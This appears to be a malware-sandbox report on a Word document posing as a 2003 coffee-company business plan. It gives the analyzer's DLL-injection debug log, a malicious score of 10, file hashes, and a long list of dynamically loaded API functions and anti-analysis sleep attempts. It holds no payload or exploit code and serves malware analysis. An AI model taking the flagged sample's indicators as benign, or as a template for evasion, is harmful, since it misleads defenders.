2019-10-10 01:12:20,325 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:20,513 [root] DEBUG: DLL unloaded from 0x000007FEF78B0000.
2019-10-10 01:12:20,513 [root] DEBUG: DLL unloaded from 0x6B930000.
2019-10-10 01:12:20,559 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:20,591 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:20,716 [root] DEBUG: DLL unloaded from 0x000007FEFA960000.
2019-10-10 01:12:20,732 [root] DEBUG: DLL unloaded from 0x000007FEF92D0000.
2019-10-10 01:12:20,857 [root] DEBUG: DLL loaded at 0x6AF90000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-10-10 01:12:20,871 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 1884
2019-10-10 01:12:20,871 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:12:20,888 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:20,888 [root] DEBUG: Loader: Injecting process 1884 (thread 1940) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,888 [root] DEBUG: Process image base: 0x2DFD0000
2019-10-10 01:12:20,888 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,888 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2DFEF000 - 0x77380000
2019-10-10 01:12:20,888 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2DFF0000.
2019-10-10 01:12:20,888 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:12:20,888 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,888 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1884
2019-10-10 01:12:20,903 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 1884
2019-10-10 01:12:20,903 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:12:20,918 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:20,918 [root] DEBUG: Loader: Injecting process 1884 (thread 1940) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,918 [root] DEBUG: Process image base: 0x2DFD0000
2019-10-10 01:12:20,918 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,918 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:12:20,918 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:20,918 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1884
2019-10-10 01:12:22,681 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-10-10 01:12:40,964 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2820
2019-10-10 01:12:40,964 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:12:40,964 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:40,980 [root] DEBUG: Loader: Injecting process 2820 (thread 2628) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [root] DEBUG: Process image base: 0x2DAD0000
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2DAEF000 - 0x77380000
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2DAF0000.
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:12:40,980 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2820
2019-10-10 01:12:40,980 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2820
2019-10-10 01:12:40,980 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:12:40,980 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:12:40,980 [root] DEBUG: Loader: Injecting process 2820 (thread 2628) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [root] DEBUG: Process image base: 0x2DAD0000
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:12:40,980 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:12:40,980 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2820
2019-10-10 01:12:41,012 [root] DEBUG: DLL loaded at 0x6AF80000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-10-10 01:12:41,012 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-10-10 01:13:01,088 [root] DEBUG: set_caller_info: Adding region at 0x05B60000 to caller regions list (ntdll::memcpy).
2019-10-10 01:13:01,417 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2500
2019-10-10 01:13:01,417 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:13:01,431 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:13:01,431 [root] DEBUG: Loader: Injecting process 2500 (thread 3020) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [root] DEBUG: Process image base: 0x2DA70000
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2DA8F000 - 0x77380000
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2DA90000.
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:13:01,431 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2500
2019-10-10 01:13:01,431 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2500
2019-10-10 01:13:01,431 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:13:01,431 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:13:01,431 [root] DEBUG: Loader: Injecting process 2500 (thread 3020) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,431 [root] DEBUG: Process image base: 0x2DA70000
2019-10-10 01:13:01,431 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,447 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:13:01,447 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:01,447 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2500
2019-10-10 01:13:14,286 [root] DEBUG: DLL unloaded from 0x000007FEFE710000.
2019-10-10 01:13:21,477 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2192
2019-10-10 01:13:21,477 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:13:21,477 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:13:21,477 [root] DEBUG: Loader: Injecting process 2192 (thread 1504) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,477 [root] DEBUG: Process image base: 0x2D3A0000
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x2D3BF000 - 0x77380000
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: Allocated 0x1c8 bytes for new import table at 0x2D3C0000.
2019-10-10 01:13:21,477 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:13:21,477 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,477 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2192
2019-10-10 01:13:21,493 [root] INFO: Announced 32-bit process name: FLTLDR.EXE pid: 2192
2019-10-10 01:13:21,493 [lib.api.process] INFO: 32-bit DLL to inject is C:\weesndvahu\dll\GSqAxLd.dll, loader C:\weesndvahu\bin\zyKKHPv.exe
2019-10-10 01:13:21,493 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\MdgGvTgKXB.
2019-10-10 01:13:21,493 [root] DEBUG: Loader: Injecting process 2192 (thread 1504) with C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,493 [root] DEBUG: Process image base: 0x2D3A0000
2019-10-10 01:13:21,493 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,493 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:13:21,493 [root] DEBUG: Successfully injected DLL C:\weesndvahu\dll\GSqAxLd.dll.
2019-10-10 01:13:21,493 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2192
2019-10-10 01:13:42,257 [root] DEBUG: DLL loaded at 0x3F100000: C:\Program Files (x86)\Microsoft Office\OFFICE14\PROOF\1033\MSGR3EN (0x311000 bytes).
2019-10-10 01:13:42,335 [root] DEBUG: set_caller_info: Adding region at 0x0B510000 to caller regions list (advapi32::RegCreateKeyExA).
2019-10-10 01:13:42,726 [root] DEBUG: set_caller_info: Adding region at 0x00650000 to caller regions list (kernel32::FindResourceExW).
2019-10-10 01:13:43,740 [root] DEBUG: set_caller_info: Adding region at 0x0BC20000 to caller regions list (ntdll::memcpy).
2019-10-10 01:13:44,487 [root] DEBUG: set_caller_info: Adding region at 0x001F0000 to caller regions list (ntdll::NtYieldExecution).
2019-10-10 01:13:45,392 [root] DEBUG: set_caller_info: Adding region at 0x0BE80000 to caller regions list (kernel32::FindResourceExW).
2019-10-10 01:13:46,719 [root] DEBUG: set_caller_info: Adding region at 0x00980000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:13:46,734 [root] DEBUG: set_caller_info: Adding region at 0x00020000 to caller regions list (msvcrt::memcpy).
2019-10-10 01:13:47,874 [modules.auxiliary.human] INFO: Closing Office window.
2019-10-10 01:13:48,279 [root] DEBUG: DLL unloaded from 0x3F100000.
2019-10-10 01:13:48,309 [root] DEBUG: DLL unloaded from 0x70450000.
2019-10-10 01:13:48,325 [root] DEBUG: DLL unloaded from 0x70240000.
2019-10-10 01:13:48,357 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x74BE0000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x6AF50000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x74BE0000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x76EA0000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x6AFB0000.
2019-10-10 01:13:48,466 [root] DEBUG: DLL unloaded from 0x65300000.
2019-10-10 01:13:48,591 [root] DEBUG: DLL loaded at 0x74D70000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:13:48,591 [root] DEBUG: DLL unloaded from 0x74D70000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x76EA0000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x6AF10000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x6BA50000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:13:48,607 [root] DEBUG: DLL unloaded from 0x6B9D0000.
2019-10-10 01:13:48,621 [root] DEBUG: DLL unloaded from 0x73E00000.
2019-10-10 01:13:48,638 [root] DEBUG: DLL unloaded from 0x2FA00000.
2019-10-10 01:13:48,638 [root] DEBUG: DLL unloaded from 0x6B990000.
2019-10-10 01:13:48,638 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:13:48,746 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-10-10 01:13:48,746 [root] DEBUG: DLL unloaded from 0x74AF0000.
2019-10-10 01:13:48,746 [root] DEBUG: DLL unloaded from 0x70240000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x6B930000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x74B00000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x76FC0000.
2019-10-10 01:13:48,763 [root] DEBUG: DLL unloaded from 0x6B990000.
2019-10-10 01:13:48,809 [root] DEBUG: DLL unloaded from 0x000007FEF9A50000.
2019-10-10 01:13:48,809 [root] DEBUG: DLL unloaded from 0x000007FEF7880000.
2019-10-10 01:13:48,825 [root] WARNING: File at path "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp" does not exist, skip.
2019-10-10 01:13:48,825 [root] DEBUG: DLL unloaded from 0x75A50000.
2019-10-10 01:13:48,841 [root] DEBUG: DLL unloaded from 0x6B830000.
2019-10-10 01:13:48,903 [root] DEBUG: DLL unloaded from 0x77050000.
2019-10-10 01:13:48,903 [root] DEBUG: DLL unloaded from 0x75700000.
2019-10-10 01:13:48,903 [root] DEBUG: DLL unloaded from 0x74BB0000.
2019-10-10 01:13:48,903 [root] INFO: Notified of termination of process with pid 2360.
2019-10-10 01:13:49,371 [root] INFO: Process with pid 2360 has terminated
2019-10-10 01:13:57,811 [root] DEBUG: DLL unloaded from 0x000007FEFC760000.
2019-10-10 01:13:57,825 [root] DEBUG: DLL unloaded from 0x000007FEFE6E0000.
2019-10-10 01:13:57,825 [root] INFO: Notified of termination of process with pid 2616.
2019-10-10 01:13:58,528 [root] INFO: Process with pid 2616 has terminated
2019-10-10 01:15:20,694 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-10-10 01:15:20,694 [root] INFO: Created shutdown mutex.
2019-10-10 01:15:21,707 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 1708
2019-10-10 01:15:21,707 [root] INFO: Terminate event set for process 1708.
2019-10-10 01:15:21,707 [root] DEBUG: Terminate Event: Skipping dump of process 1708
2019-10-10 01:15:21,707 [root] INFO: Terminating process 1708 before shutdown.
2019-10-10 01:15:21,707 [root] DEBUG: Terminate Event: Shutdown complete for process 1708 but failed to inform analyzer.
2019-10-10 01:15:21,707 [root] INFO: Waiting for process 1708 to exit.
2019-10-10 01:15:22,710 [root] INFO: Shutting down package.
2019-10-10 01:15:22,710 [root] INFO: Stopping auxiliary modules.
2019-10-10 01:15:22,710 [root] INFO: Finishing auxiliary modules.
2019-10-10 01:15:22,710 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-10-10 01:15:22,710 [root] WARNING: File at path "C:\ULEoWPzTY\debugger" does not exist, skip.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 154729807.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 1.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 1884.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 2820.
2019-10-10 01:15:22,710 [root] WARNING: Monitor injection attempted but failed for process 2500.
2019-10-10 01:15:22,720 [root] WARNING: Monitor injection attempted but failed for process 2192.
2019-10-10 01:15:22,720 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-10-10 00:11:52 2019-10-10 00:16:24

File Details

File Name tmpsh5v7u_m
File Size 4200960 bytes
File Type Composite Document File V2 Document, Little Endian, Os: MacOS, Version 10.3, Code page: 10000, Title: Brain Coffee Co. Preliminary Business Plan, Subject: December 2003, Author: Patrick Feld, Template: Normal, Last Saved By: Mark Portrait, Revision Number: 28, Name of Creating Application: Microsoft Word 9.0, Total Editing Time: 10:27:00, Create Time/Date: Thu Dec 11 04:58:00 2003, Last Saved Time/Date: Fri Dec 19 21:44:00 2003, Number of Pages: 42, Number of Words: 14927, Number of Characters: 85085, Security: 2
MD5 7cad33500a32cf4335f4553922650ef2
SHA1 fc1619f581f8fa976bf6ca42aa856818775ddbfe
SHA256 31cb9054db8cfa48e2bac12b291ef7581cc4b96a8d47d0167465f1fd16436fd5
SHA512 a2e5dc8cd8dafd1adf1f2c478e24b6e345c585300cb2efb160ab6c1c808a7bb6c114e40c42088880b9080e38da20bb8d634b10e5623727c18c8ba8e35ef27c3f
CRC32 C3C994F9
Ssdeep 98304:blM+Qge+ZdqmvEReVpydCQMlM+Qge+Zdqm:ucZdqmRQCQNcZdqm
TrID
  • 35.5% (.XLS) Microsoft Excel sheet (32500/1/3)
  • 34.9% (.DOC) Microsoft Word document (32000/1/3)
  • 20.7% (.DOC) Microsoft Word document (old ver.) (19000/1/2)
  • 8.7% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
A process attempted to delay the analysis task.
Process: splwow64.exe tried to sleep 1320 seconds, actually delayed analysis time by 0 seconds
Process: WINWORD.EXE tried to sleep 570 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: GKWord.dll/FValidateWordFile
DynamicLoader: GKWord.dll/HrInitHost
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: UxTheme.DLL/EnableThemeDialogTexture
DynamicLoader: UxTheme.DLL/OpenThemeData
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GetLayout
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: GDI32.dll/GetFontAssocStatus
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/RpcMgmtIsServerListening
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/StartDocDlgW
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/ResetPrinterW
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/ReadPrinter
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/AbortPrinter
DynamicLoader: Winspool.DRV/DocumentEvent
DynamicLoader: Winspool.DRV/QuerySpoolMode
DynamicLoader: Winspool.DRV/QueryRemoteFonts
DynamicLoader: Winspool.DRV/SeekPrinter
DynamicLoader: Winspool.DRV/QueryColorProfile
DynamicLoader: Winspool.DRV/SplDriverUnloadComplete
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/
DynamicLoader: Winspool.DRV/IsValidDevmodeW
DynamicLoader: Winspool.DRV/GetSpoolFileHandle
DynamicLoader: Winspool.DRV/CommitSpoolData
DynamicLoader: Winspool.DRV/CloseSpoolFileHandle
DynamicLoader: Winspool.DRV/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GetCharABCWidthsI
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: GdiPlus.dll/GdiplusStartup
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: GDI32.dll/ExtTextOutW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: GdiPlus.dll/GdipLoadImageFromStreamICM
DynamicLoader: WindowsCodecs.dll/DllGetClassObject
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: GdiPlus.dll/GdipGetImageRawFormat
DynamicLoader: GdiPlus.dll/GdipGetImageFlags
DynamicLoader: GdiPlus.dll/GdipGetImageWidth
DynamicLoader: GdiPlus.dll/GdipGetImageHeight
DynamicLoader: GdiPlus.dll/GdipGetImagePixelFormat
DynamicLoader: GdiPlus.dll/GdipGetImageHorizontalResolution
DynamicLoader: GdiPlus.dll/GdipGetImageVerticalResolution
DynamicLoader: GdiPlus.dll/GdipImageGetFrameCount
DynamicLoader: GdiPlus.dll/GdipDisposeImage
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeletePath
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
